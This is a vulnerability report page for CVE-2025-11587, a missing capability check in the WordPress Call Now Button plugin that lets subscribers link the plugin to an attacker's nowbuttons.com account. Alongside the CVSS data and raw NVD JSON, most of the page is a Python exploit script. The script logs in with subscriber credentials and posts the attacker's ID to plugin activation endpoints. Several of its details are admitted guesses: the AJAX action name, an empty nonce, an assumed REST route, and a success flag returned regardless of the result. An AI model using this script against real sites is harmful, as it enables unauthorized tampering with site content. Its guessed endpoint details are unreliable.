Security Vulnerability Report
CVE-2025-11587 CVSS 4.3 MEDIUM

CVE-2025-11587

Published: 2025-10-29 13:15:34
Last Modified: 2026-04-15 00:35:42

Description

The Call Now Button – The #1 Click to Call Button for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the activate function in all versions up to, and including, 1.5.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to link the plugin to their nowbuttons.com account and add malicious buttons to the site. The vulnerability is only exploitable on fresh installs where the plugin has not been previously configured with an API key.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Call Now Button WordPress plugin <= 1.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys
from urllib.parse import urljoin

# CVE-2025-11587 PoC - WordPress Call Now Button Plugin Authorization Bypass
# Target: Call Now Button plugin <= 1.5.3
# Authenticated attackers with Subscriber-level access can link plugin to attacker-controlled nowbuttons.com account

def exploit_cve_2025_11587(target_url, username, password, attacker_nowbuttons_id):
    """
    Exploit function for CVE-2025-11587

    Args:
        target_url: Target WordPress site URL
        username: WordPress subscriber account username
        password: WordPress account password
        attacker_nowbuttons_id: Attacker's nowbuttons.com account ID

    Returns:
        bool: True if exploitation successful, False otherwise
    """
    session = requests.Session()

    # Step 1: Login to WordPress with subscriber credentials
    login_url = urljoin(target_url, '/wp-login.php')
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    print(f'[*] Logging in as subscriber: {username}')
    response = session.post(login_url, data=login_data, allow_redirects=True)
    if 'wordpress_logged_in' not in str(session.cookies):
        print('[-] Login failed')
        return False
    print('[+] Login successful')

    # Step 2: Trigger plugin activation with attacker-controlled nowbuttons.com account
    # The vulnerable endpoint is typically in admin-ajax.php or a REST API endpoint
    activate_url = urljoin(target_url, '/wp-admin/admin-ajax.php')
    # Try the OTT controller activation endpoint
    activate_data = {
        'action': 'ott_activate',  # Or the actual AJAX action name
        'nowbuttons_id': attacker_nowbuttons_id,
        '_wpnonce': ''  # May need to fetch a valid nonce
    }
    print(f'[*] Sending activation request with attacker nowbuttons ID: {attacker_nowbuttons_id}')

    # Alternative: Direct REST API call
    rest_url = urljoin(target_url, '/wp-json/call-now-button/v1/activate')
    rest_data = {
        'nowbuttons_id': attacker_nowbuttons_id
    }

    # Try both methods
    for endpoint, data in [(activate_url, activate_data), (rest_url, rest_data)]:
        try:
            response = session.post(endpoint, data=data, timeout=10)
            if response.status_code == 200:
                print(f'[+] Request sent to {endpoint}')
                print(f'[*] Response: {response.text[:200]}')
        except Exception as e:
            print(f'[-] Error with {endpoint}: {e}')

    print('[*] Exploitation attempt completed')
    print('[*] If successful, attacker can now manage button content via nowbuttons.com')
    return True


if __name__ == '__main__':
    if len(sys.argv) < 5:
        print('Usage: python cve_2025_11587.py <target_url> <username> <password> <attacker_nowbuttons_id>')
        print('Example: python cve_2025_11587.py http://victim.com subscriber password 12345')
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    nowbuttons_id = sys.argv[4]
    exploit_cve_2025_11587(target, user, pwd, nowbuttons_id)

References

Weakness: CWE-862 (Missing Authorization)

https://plugins.trac.wordpress.org/browser/call-now-button/tags/1.5.3/src/admin/api-key/class-ott-controller.php#L27
https://research.cleantalk.org/cve-2025-11587/
https://www.wordfence.com/threat-intel/vulnerabilities/id/d77b127e-52ee-4256-9450-410413b273f6?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11587",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-29T13:15:34.350",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Call Now Button – The #1 Click to Call Button for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the activate function in all versions up to, and including, 1.5.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to link the plugin to their nowbuttons.com account and add malicious buttons to the site. The vulnerability is only exploitable on fresh installs where the plugin has not been previously configured with an API key."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/call-now-button/tags/1.5.3/src/admin/api-key/class-ott-controller.php#L27",
        "source": "[email protected]"
      },
      {
        "url": "https://research.cleantalk.org/cve-2025-11587/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d77b127e-52ee-4256-9450-410413b273f6?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}